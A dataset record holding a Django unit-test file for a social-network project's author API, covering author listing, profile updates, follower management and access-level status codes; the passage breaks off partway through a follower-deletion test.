hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5d2368d66a9431e65ae2ab4e3382842514bb7e03
| 45,552
|
py
|
Python
|
tests/apis/authors/test_author_api.py
|
cmput404F21/CMPUT404-project-socialdistribution
|
47f108b43886a4e482c6b6f9c6fdef6dcc005c3f
|
[
"W3C-20150513"
] | null | null | null |
tests/apis/authors/test_author_api.py
|
cmput404F21/CMPUT404-project-socialdistribution
|
47f108b43886a4e482c6b6f9c6fdef6dcc005c3f
|
[
"W3C-20150513"
] | 48
|
2021-10-12T21:41:39.000Z
|
2021-12-08T19:40:25.000Z
|
tests/apis/authors/test_author_api.py
|
cmput404F21/CMPUT404-project-socialdistribution
|
47f108b43886a4e482c6b6f9c6fdef6dcc005c3f
|
[
"W3C-20150513"
] | 1
|
2022-01-11T04:07:43.000Z
|
2022-01-11T04:07:43.000Z
|
from django.test import TestCase
from django.urls import reverse
import json
from rest_framework.test import APIClient
from tests.test_helper.auth_helper import AuthHelper
from apps.core.models import Author, User
from uuid import uuid4
class AuthorViewTests(TestCase):
def createAdmin(self):
self.auth_helper = AuthHelper()
self.auth_helper.setup()
self.client = APIClient()
self.auth_helper.authorize_client(self.client)
def test_get_authors(self):
"""
should retrieve all authors in db
"""
host = "http://testserver"
displayName = "testUser1"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
displayName2 = "testUser2"
github2 = "https://github.com/testUser2"
profileImage2 = "https://www.website.com/pfp2.png"
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
author.displayName=displayName
author.github=github
author.profileImage=profileImage
author.save()
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
author2.displayName=displayName2
author2.github=github2
author2.profileImage=profileImage2
author2.save()
response = self.client.get(reverse("author:authors"))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
authorList = json.loads(response.content)["data"]
self.assertEqual(len(authorList), 2)
data: dict = authorList[0]
self.assertTrue("id" in data, "an author is missing the id field!")
if data["id"] == str(author.id):
self.assertEquals(data["type"], "author", "returned author had wrong type!")
self.assertEquals(data["id"], str(author.id), "returned author did not match one of the created ones!")
self.assertEquals(data["url"], host + "/author/" + str(author.id), "returned author had wrong url!")
self.assertEquals(data["host"], host, "returned author had wrong host!")
self.assertEquals(data["displayName"], displayName, "returned author did not match one of the created ones!")
self.assertEquals(data["github"], github, "returned author did not match one of the created ones!")
self.assertEquals(data["profileImage"], profileImage, "returned author did not match one of the created ones!")
data: dict = authorList[1]
self.assertEquals(data["type"], "author", "returned author had wrong type!")
self.assertEquals(data["id"], str(author2.id), "returned author did not match one of the created ones!")
self.assertEquals(data["url"], host + "/author/" + str(author2.id), "returned author had wrong url!")
self.assertEquals(data["host"], host, "returned author had wrong host!")
self.assertEquals(data["displayName"], displayName2, "returned author did not match one of the created ones!")
self.assertEquals(data["github"], github2, "returned author did not match one of the created ones!")
self.assertEquals(data["profileImage"], profileImage2, "returned author did not match one of the created ones!")
else:
self.assertEquals(data["type"], "author", "returned author had wrong type!")
self.assertEquals(data["id"], str(author2.id), "returned author did not match one of the created ones!")
self.assertEquals(data["url"], host + "/author/" + str(author2.id), "returned author had wrong url!")
self.assertEquals(data["host"], host, "returned author had wrong host!")
self.assertEquals(data["displayName"], displayName2, "returned author did not match one of the created ones!")
self.assertEquals(data["github"], github2, "returned author did not match one of the created ones!")
self.assertEquals(data["profileImage"], profileImage2, "returned author did not match one of the created ones!")
data: dict = authorList[1]
self.assertEquals(data["type"], "author", "returned author had wrong type!")
self.assertEquals(data["id"], str(author.id), "returned author did not match one of the created ones!")
self.assertEquals(data["url"], host + "/author/" + str(author.id), "returned author had wrong url!")
self.assertEquals(data["host"], host, "returned author had wrong host!")
self.assertEquals(data["displayName"], displayName, "returned author did not match one of the created ones!")
self.assertEquals(data["github"], github, "returned author did not match one of the created ones!")
self.assertEquals(data["profileImage"], profileImage, "returned author did not match one of the created ones!")
def test_get_authors_access_levels(self):
"""
should retrieve all authors in db
"""
password = "password"
user = User.objects.create_user("username1", password=password)
author: Author = Author.objects.get(userId=user)
author.save()
# test anonymous users
response = self.client.get(reverse("author:authors"))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test regular user
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.get(reverse("author:authors"))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test admin
self.client.logout()
self.createAdmin()
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.get(reverse("author:authors"))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_get_authors_empty_db(self):
"""
should return an empty list
"""
response = self.client.get(reverse("author:authors"))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
self.assertEqual(len(json.loads(response.content)["data"]), 0, "GET /authors is returning something even with an empty db!")
# ############################################################
# # SINGLE AUTHOR TESTS
# ############################################################
# GETs #####################
def test_get_author(self):
"""
should return appropriate author from db
"""
host = "http://testserver"
displayName = "testUser1"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
displayName2 = "testUser2"
github2 = "https://github.com/testUser2"
profileImage2 = "https://www.website.com/pfp2.png"
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
author.displayName=displayName
author.github=github
author.profileImage=profileImage
author.save()
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
author2.displayName=displayName2
author2.github=github2
author2.profileImage=profileImage2
author2.save()
response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
data: dict = json.loads(response.content)
self.assertEquals(data["type"], "author", "returned author had wrong type!")
self.assertEquals(data["id"], str(author2.id), "returned author had wrong id!")
self.assertEquals(data["url"], host + "/author/" + str(author2.id), "returned author had wrong url!")
self.assertEquals(data["host"], host, "returned author had wrong host!")
self.assertEquals(data["displayName"], displayName2, "returned author had wrong displayName!")
self.assertEquals(data["github"], github2, "returned author had wrong github!")
self.assertEquals(data["profileImage"], profileImage2, "returned author had wrong profileImage!")
def test_get_author_access_levels(self):
"""
should return 200 for all users
"""
password = "password"
user = User.objects.create_user("username1", password=password)
author: Author = Author.objects.get(userId=user)
author.save()
user2 = User.objects.create_user("username2", password=password)
author2: Author = Author.objects.get(userId=user2)
author2.save()
# test anonymous user
response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test regular user
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test subject of call
self.client.logout()
self.assertTrue(self.client.login(username=user2.username, password=password))
response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test admin
self.client.logout()
self.createAdmin()
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.get(reverse("author:author", kwargs={"author_id":author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_get_author_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
response = self.client.get(reverse("author:author", kwargs={"author_id":uuid4()}))
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_get_author_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
response = self.client.get(reverse("author:author", kwargs={"author_id":"notARealUUID"}))
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_get_author_empty_db(self):
"""
should return 404
"""
user = User(username="username1")
response = self.client.get(reverse("author:author", kwargs={"author_id":user.id}))
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
# POSTs ####################
def test_post_author(self):
"""
create a user and carry out a post request. Should return
an author that is associated with the original user, but with
modified fields
"""
displayName = "testUser"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
author.save()
# we haven't set these fields
self.assertEqual(author.displayName, "username1")
self.assertEqual(author.github, "")
self.assertEqual(author.profileImage, "")
authorType = "author"
host = "http://testserver"
url = host + "/author/" + str(author.id)
json_str = f"""
{{
"type" : "{authorType}",
"id" : "{author.id}",
"displayName" : "{displayName}",
"github" : "{github}",
"profileImage" : "{profileImage}",
"host" : "{host}",
"url" : "{url}"
}}
"""
self.createAdmin()
self.auth_helper.get_author()
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
data: dict = json.loads(response.content)
self.assertEquals(data["type"], "author", "returned author had wrong type!")
self.assertEquals(data["id"], str(author.id), "returned author had wrong id!")
self.assertEquals(data["url"], host + "/author/" + str(author.id), "returned author had wrong url!")
self.assertEquals(data["host"], host, "returned author had wrong host!")
self.assertEquals(data["displayName"], displayName, "returned author had wrong displayName!")
self.assertEquals(data["github"], github, "returned author had wrong github!")
self.assertEquals(data["profileImage"], profileImage, "returned author had wrong profileImage!")
# make sure changes propagated to db
author2: Author = Author.objects.get(userId=user)
self.assertEqual(author2.displayName, displayName)
self.assertEqual(author2.github, github)
self.assertEqual(author2.profileImage, profileImage)
def test_post_author_access_levels(self):
"""
should return 401 for anonymous users and 403 for all users except admins
"""
displayName = "testUser"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
password = "password"
user = User.objects.create_user("username1", password=password)
author: Author = Author.objects.get(userId=user)
author.save()
# we haven't set these fields
self.assertEqual(author.displayName, "username1")
self.assertEqual(author.github, "")
self.assertEqual(author.profileImage, "")
authorType = "author"
host = "http://testserver"
url = host + "/author/" + str(author.id)
json_str = f"""
{{
"type" : "{authorType}",
"id" : "{author.id}",
"displayName" : "{displayName}",
"github" : "{github}",
"profileImage" : "{profileImage}",
"host" : "{host}",
"url" : "{url}"
}}
"""
# test anonymous user
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 401, f"expected 401. got: {response.status_code}")
# test non participant user
nonParticipant = User.objects.create_user("nonParticipant", password=password)
self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
# test subject of call
self.client.logout()
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
# test admin
self.client.logout()
self.createAdmin()
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_post_author_id_mismatch(self):
"""
should return 400
"""
displayName = "testUser"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
user = User.objects.create_user("username1")
author = Author.objects.get(userId=user)
authorType = "author"
host = "http://testserver"
url = host + "/author/" + str(author.id)
json_str = f"""
{{
"type" : "{authorType}",
"id" : "{uuid4()}",
"displayName" : "{displayName}",
"github" : "{github}",
"profileImage" : "{profileImage}",
"host" : "{host}",
"url" : "{url}"
}}
"""
self.createAdmin()
self.auth_helper.get_author()
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
self.assertEqual(response.content.decode('utf-8'), "The id of the author in the body does not match the author_id in the request.")
def test_post_author_host_mismatch(self):
"""
should return 400
"""
displayName = "testUser"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
user = User.objects.create_user("username1")
author = Author.objects.get(userId=user)
authorType = "author"
host = "http://someWrongHost"
url = host + "/author/" + str(author.id)
json_str = f"""
{{
"type" : "{authorType}",
"id" : "{author.id}",
"displayName" : "{displayName}",
"github" : "{github}",
"profileImage" : "{profileImage}",
"host" : "{host}",
"url" : "{url}"
}}
"""
self.createAdmin()
self.auth_helper.get_author()
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
self.assertEqual(response.content.decode('utf-8'), "The author is not from a supported host.")
def test_post_author_type_mismatch(self):
"""
should return 400
"""
displayName = "testUser"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
user = User.objects.create_user("username1")
author = Author.objects.get(userId=user)
authorType = "someWrongType"
host = "http://testserver"
url = host + "/author/" + str(author.id)
json_str = f"""
{{
"type" : "{authorType}",
"id" : "{author.id}",
"displayName" : "{displayName}",
"github" : "{github}",
"profileImage" : "{profileImage}",
"host" : "{host}",
"url" : "{url}"
}}
"""
self.createAdmin()
self.auth_helper.get_author()
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
self.assertEqual(response.content.decode('utf-8'), "Can not change the type of an author")
def test_post_author_user_nonexist(self):
"""
should return 404
"""
displayName = "testUser"
github = "https://github.com/testUser"
profileImage = "https://www.website.com/pfp.png"
id = uuid4()
authorType = "author"
host = "http://testserver"
url = host + "/author/" + str(id)
json_str = f"""
{{
"type" : "{authorType}",
"id" : "{id}",
"displayName" : "{displayName}",
"github" : "{github}",
"profileImage" : "{profileImage}",
"host" : "{host}",
"url" : "{url}"
}}
"""
self.createAdmin()
self.auth_helper.get_author()
response = self.client.post(reverse('author:author', kwargs={'author_id':id}), json.loads(json_str), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_post_author_empty_request(self):
"""
should return 400
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.post(reverse('author:author', kwargs={'author_id':author.id}), {}, format="json")
self.assertEqual(response.status_code, 400, f"expected 400. got: {response.status_code}")
# ############################################################
# # FRIEND AND FOLLOWER TESTS
# ############################################################
# PUTs #####################
def test_put_follower(self):
"""
should return 200
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_put_follower_access_levels(self):
"""
should return 401 for anonymous users, 403 for non participants and the followee, and 200 for the follower and admins
"""
password = "password"
user = User.objects.create_user("username1", password=password)
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2", password=password)
author2: Author = Author.objects.get(userId=user2)
# test anonymous user
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 401, f"expected 401. got: {response.status_code}")
# test non participant user
nonParticipant = User.objects.create_user("nonParticipant", password=password)
self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
# test followee
self.client.logout()
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
# test follower
self.client.logout()
self.assertTrue(self.client.login(username=user2.username, password=password))
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test admin
self.client.logout()
self.createAdmin()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_put_follower_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = uuid4()
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_put_follower_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = "notARealUUID"
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_put_follower_author_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = uuid4()
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_put_follower_author_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = "notARealUUID"
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_put_follower_twice(self):
"""
should return 200
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_put_follower_is_one_sided(self):
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 1, f"expected 1 follow. got: {len(dict_resp_data)}")
self.assertEqual(dict_resp_data[0]["id"], str(author2.id), "the follow request follows the wrong author!")
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 0, "the request recipient is following the sender!")
# GETs #####################
def test_get_followers(self):
"""
should return a list of the author's appropriate followers
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
user3 = User.objects.create_user("username3",)
author3: Author = Author.objects.get(userId=user3)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author2.id, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author3.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author2.id, 'foreign_author_id':author3.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 2, f"expected 2 items. got: {len(dict_resp_data)}")
data1 = dict_resp_data[0]
data2 = dict_resp_data[1]
if data1["id"] == str(author3.id):
temp = data1
data1 = data2
data2 = temp
self.assertEqual(data1["id"], str(author2.id), f"a user got a follow from the wrong author! Expected {str(author2.id)}")
self.assertEqual(data2["id"], str(author3.id), f"a user got a follow from the wrong author! Expected {str(author3.id)}")
def test_get_followers_access_levels(self):
"""
should return 200 for all users
"""
password = "password"
user = User.objects.create_user("username1", password=password)
author: Author = Author.objects.get(userId=user)
# test anonymous user
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test non participant user
nonParticipant = User.objects.create_user("nonParticipant", password=password)
self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test follower
self.client.logout()
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test admin
self.client.logout()
self.createAdmin()
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
def test_get_followers_empty(self):
"""
should return an empty list
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 0, "follower list wasn't empty!")
def test_get_specific_follower(self):
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.get(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp = json.loads(response.content)
self.assertEqual(dict_resp["id"], str(author2.id), f"incorrect author id! Expected: {str(author2.id)}")
def test_get_specific_follower_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = uuid4()
response = self.client.get(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_get_specific_follower_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = "notARealUUID"
response = self.client.get(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_get_specific_follower_author_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = uuid4()
response = self.client.get(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_get_specific_follower_author_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = "notARealUUID"
response = self.client.get(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
# DELETEs ##################
def test_delete_follower(self):
"""
should succesfully remove the follower
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author2.id, 'foreign_author_id':author.id}), format="json")
